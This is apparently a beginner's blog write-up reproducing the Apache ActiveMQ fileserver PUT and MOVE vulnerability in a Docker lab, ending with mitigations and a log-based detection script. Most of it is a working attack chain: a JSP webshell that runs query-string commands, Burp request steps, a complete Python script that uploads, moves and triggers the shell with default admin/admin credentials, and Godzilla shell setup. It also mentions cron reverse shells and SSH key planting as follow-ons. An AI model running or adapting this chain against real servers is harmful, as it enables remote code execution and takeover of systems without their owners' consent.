1. Vulnerability Details
Affected versions: Apache ActiveMQ 5.x up to and including 5.13.x (the fileserver webapp no longer exists in 5.14.0).
Vulnerability principle: the fileserver webapp of the ActiveMQ web console accepts HTTP PUT to store arbitrary files, but it serves them as static content and never compiles JSP, so a file written there does not execute. The same webapp also accepts the HTTP MOVE method, whose Destination header may point at an arbitrary path on disk. An attacker therefore PUTs a JSP into fileserver and then MOVEs it into a directory that is executable (the admin or api webapp), turning an arbitrary file write into remote code execution.
In 5.12.x and 5.13.x the fileserver application is disabled by default (it can still be enabled in conf/jetty.xml); from 5.14.0 on the fileserver application is removed entirely.
2. Reproduction process
Build the Docker environment:
docker-compose up -d
Open port 8161 in a browser.
Log in with the default credentials admin/admin.
Write the webshell file
A usable webshell needs the following prerequisites:
The absolute path of the upload location is known.
The site exposes a way to write files (here, HTTP PUT to /fileserver).
File types are not restricted.
The written file can be executed (it must end up in a webapp that compiles JSP).
The absolute install path of ActiveMQ (the activemq.home and activemq.base system properties) can be read from the console page http://your-ip:8161/admin/test/systemProperties.jsp, which requires the admin login.
A simple JSP webshell found online. It passes the `cmd` query parameter to Runtime.exec() and streams the process's stdout back to the HTTP client (stderr is not captured, so a failing command prints nothing):

```jsp
<%@ page import="java.io.*" %>
<%
    try {
        // command comes straight from the query string: /1.jsp?cmd=whoami
        String cmd = request.getParameter("cmd");
        Process child = Runtime.getRuntime().exec(cmd);

        // copy the child's stdout byte by byte into the response
        InputStream in = child.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
            out.print((char) c);
        }
        in.close();

        try {
            child.waitFor();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    } catch (IOException e) {
        // exec() failed (e.g. command not found); only logged on the server side
        System.err.println(e);
    }
%>
```
Capture a request in Burp Suite and change it to `PUT /fileserver/1.jsp HTTP/1.1` with the JSP source as the body. A `204 No Content` response means the file was written.
Visiting http://192.168.239.128:8161/fileserver/1.jsp confirms the write, but the fileserver webapp does not compile JSP, so the file is returned as plain text rather than executed.
MOVE the file into an executable directory
Send a MOVE request to the same fileserver URL with a Destination header that carries the absolute on-disk path of a JSP-enabled webapp, for example `Destination: file:///<activemq.home>/webapps/admin/1.jsp`, substituting the activemq.home value read from systemProperties.jsp. Either api or admin works; this post moves the file into the admin directory.
The ActiveMQ web console is split into three webapps: admin is the management console, api is the REST interface, and fileserver is the file storage endpoint. Only admin and api compile and run JSP.
Access the webshell
Because /admin/* sits behind HTTP Basic authentication, the browser (or tool) must supply the admin credentials:
http://192.168.239.128:8161/admin/1.jsp?cmd=ls
http://192.168.239.128:8161/admin/1.jsp?cmd=whoami
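The three requests above (PUT, MOVE, GET) scripted end to end, so the Burp steps can be repeated without a proxy. This is an added example for this post, not code from the original page or from the ActiveMQ project. The target URL and admin/admin credentials are the ones used in the post; the install path /opt/activemq is an assumption and must be replaced with the activemq.home value read from systemProperties.jsp:

```python
"""ActiveMQ fileserver PUT + MOVE reproduction helper (added example).

Assumptions: target http://192.168.239.128:8161 with admin/admin as in the
post; activemq.home=/opt/activemq is a placeholder and must be replaced with
the value shown on /admin/test/systemProperties.jsp.
"""
import base64
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass


@dataclass
class Target:
    base_url: str          # e.g. "http://192.168.239.128:8161"
    activemq_home: str     # absolute install path from systemProperties.jsp
    username: str = "admin"
    password: str = "admin"


def basic_auth_header(username: str, password: str) -> str:
    """HTTP Basic value needed for /admin/* and /api/* (admin:admin -> YWRtaW46YWRtaW4=)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"


def fileserver_url(target: Target, name: str) -> str:
    """Both PUT and MOVE are addressed to the file's path under /fileserver."""
    return f"{target.base_url}/fileserver/{name}"


def move_destination(target: Target, webapp: str, name: str) -> str:
    """Destination header for MOVE: a file:// URL to the on-disk location of a
    JSP-enabled webapp, built from activemq.home."""
    if webapp not in ("admin", "api"):
        raise ValueError("only the admin and api webapps compile JSP")
    return f"file://{target.activemq_home}/webapps/{webapp}/{name}"


def webshell_url(target: Target, webapp: str, name: str, cmd: str) -> str:
    """URL that invokes the moved shell, with the command URL-encoded."""
    return f"{target.base_url}/{webapp}/{name}?cmd={urllib.parse.quote(cmd)}"


def send(method, url, headers=None, body=None, timeout=10.0):
    """Send one request; return (status, body). HTTP error statuses are returned, not raised."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def write_and_move(target: Target, name: str, jsp_source: str,
                   webapp: str = "admin", cmd: str = "id") -> str:
    """PUT the JSP into fileserver, MOVE it into `webapp`, then run `cmd` through it."""
    # Step 1: PUT. A successful write is answered with 204 No Content (as seen in the post).
    status, _ = send("PUT", fileserver_url(target, name), body=jsp_source.encode())
    if status != 204:
        raise RuntimeError(f"PUT failed with HTTP {status}")

    # Step 2: MOVE. The Destination header carries the absolute file:// path;
    # a successful move is also answered with 204.
    status, _ = send("MOVE", fileserver_url(target, name),
                     headers={"Destination": move_destination(target, webapp, name)})
    if status != 204:
        raise RuntimeError(f"MOVE failed with HTTP {status}")

    # Step 3: call the shell. admin and api are protected by Basic auth.
    status, body = send("GET", webshell_url(target, webapp, name, cmd),
                        headers={"Authorization": basic_auth_header(target.username,
                                                                    target.password)})
    if status != 200:
        raise RuntimeError(f"webshell request failed with HTTP {status}")
    return body.decode(errors="replace")


if __name__ == "__main__":
    # /opt/activemq is an assumed path; read the real one from systemProperties.jsp.
    t = Target("http://192.168.239.128:8161", "/opt/activemq")
    with open("1.jsp") as fh:
        print(write_and_move(t, "1.jsp", fh.read(), webapp="admin", cmd="whoami"))
```

Each step checks for the 204 the fileserver returns on success, so a wrong path in the Destination header (the most common failure) is reported at the MOVE step rather than showing up as a 404 on the final GET.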
(Alternative) Generate a webshell with Godzilla and connect to it
Generate a JSP webshell with Godzilla and PUT the file to the fileserver endpoint; the response is 204, so the upload succeeded.
MOVE the file into the admin webapp as above.
Connect with Godzilla:
URL=http://192.168.239.128:8161/admin/1.jsp
Make sure the payload and encryptor selected in Godzilla match the ones the shell was generated with.
Because the admin webapp requires the admin login, the authentication header has to be added in Godzilla's request configuration:
Authorization: Basic YWRtaW46YWRtaW4=
Test the connection; it succeeds.
3. Summary
Exposing the HTTP MOVE method (here through the fileserver webapp) is dangerous: combined with PUT it turns a harmless-looking file store into an arbitrary file write anywhere the broker process can write. The fix is to upgrade to 5.14.0 or later, or on older versions to leave the fileserver context disabled (or remove it) in conf/jetty.xml, change the default admin/admin credentials in conf/jetty-realm.properties, and keep port 8161 off untrusted networks.
Arbitrary file write also allows other approaches:
Writing a webshell (overwriting conf/jetty.xml only serves to remove the login requirement on admin and api, so the shell can be reached without credentials)
Writing a cron file (scheduled reverse shell)
Writing an SSH key
The following article walks through all three approaches against this vulnerability in detail:
https://www.freebuf.com/vuls/274088.html
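From the defender's side, the attack sequence described in this post leaves a distinctive trace in the web console's request log: a PUT and a MOVE against /fileserver followed by a 200 for a file of the same name under /admin or /api. The detector below is an added example, not code from the original page or from the ActiveMQ project; it assumes Jetty request logging in NCSA common log format is enabled, and the log lines it runs on are constructed for illustration:

```python
"""Flag the ActiveMQ fileserver PUT/MOVE pattern in NCSA-format request logs (added example)."""
import re

# NCSA common log format as written by Jetty's request log (assumed enabled on the broker).
NCSA = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

WRITE_METHODS = {"PUT", "MOVE", "DELETE"}
FILESERVER = "/fileserver/"

# Constructed sample lines, not real traffic: one legitimate admin, one attacker at 10.0.0.9.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /admin/index.jsp HTTP/1.1" 200 5123
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /admin/test/systemProperties.jsp HTTP/1.1" 200 8841
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "PUT /fileserver/1.jsp HTTP/1.1" 204 0
10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "MOVE /fileserver/1.jsp HTTP/1.1" 204 0
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /admin/1.jsp?cmd=whoami HTTP/1.1" 200 12
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /api/jolokia/version HTTP/1.1" 200 311
"""


def parse(line: str):
    """Return the fields of one NCSA line, or None for lines that do not match."""
    m = NCSA.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Return (client_ip, reason) alerts for fileserver writes and for later
    requests that serve a file which was MOVEd out of fileserver."""
    alerts = []
    moved_names = set()  # basenames MOVEd out of /fileserver, to correlate later hits
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        method = rec["method"]
        path = rec["path"].split("?", 1)[0]   # drop the query string (?cmd=...)
        basename = path.rsplit("/", 1)[-1]

        # Rule 1: any write method against the fileserver webapp.
        if path.startswith(FILESERVER) and method in WRITE_METHODS:
            alerts.append((rec["ip"], f"{method} to fileserver: {path}"))
            if method == "MOVE":
                moved_names.add(basename)
            continue

        # Rule 2: MOVE has no legitimate use elsewhere on the console either.
        if method == "MOVE":
            alerts.append((rec["ip"], f"unexpected MOVE: {path}"))
            continue

        # Rule 3: a file that left fileserver via MOVE is now served (200) from
        # another webapp, i.e. the webshell is being used.
        if basename and basename in moved_names and rec["status"] == "200":
            alerts.append((rec["ip"], f"moved fileserver object served from {path} (possible webshell)"))
    return alerts


if __name__ == "__main__":
    for ip, reason in detect(SAMPLE_LOG.splitlines()):
        print(f"{ip}\t{reason}")
```

Rules 1 and 2 fire on the write primitive itself and are the ones to alert on first; rule 3 is the correlation that separates a probe from a shell actually being used. The regex is strict about the NCSA layout, so lines in another format are skipped rather than misparsed.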
As a beginner, I still have a lot more to learn...